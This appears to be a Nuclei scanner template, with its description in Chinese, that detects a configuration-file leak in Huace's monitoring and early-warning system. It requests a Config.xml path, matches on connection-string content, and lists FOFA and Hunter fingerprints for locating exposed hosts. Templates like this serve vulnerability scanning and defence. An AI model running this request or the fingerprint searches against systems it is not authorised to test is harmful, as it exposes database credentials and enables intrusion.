id: huace-mews-config-xml-infoleak

info:
  name: 华测监测预警系统-config-xml-infoleak
  author: hufei
  severity: high
  description: |
    上海华测导航技术股份有限公司，是专注于国产GNSS研发、生产、销售于一体的高新技术产业集团。旗下华测监测预警系统存在目录遍历漏洞，攻击者可通过该漏洞获取系统配置信息等。
  reference:
    - https://www.huace.cn/
  metadata:
    max-request: 1
    fofa-query: icon_hash="-628229493"
    hunter-query: web.icon=="be8e2d43a4e9bc5ce43303ce55609199"
    verified: true
  tags: huace,infoleak

http:
  - method: GET
    path:
      - "{{BaseURL}}/web/Report/Rpt/Config/Config.xml"

    matchers:
      - type: word
        part: body
        words:
          - "<configuration>"
          - "<connectionStrings>"
        condition: and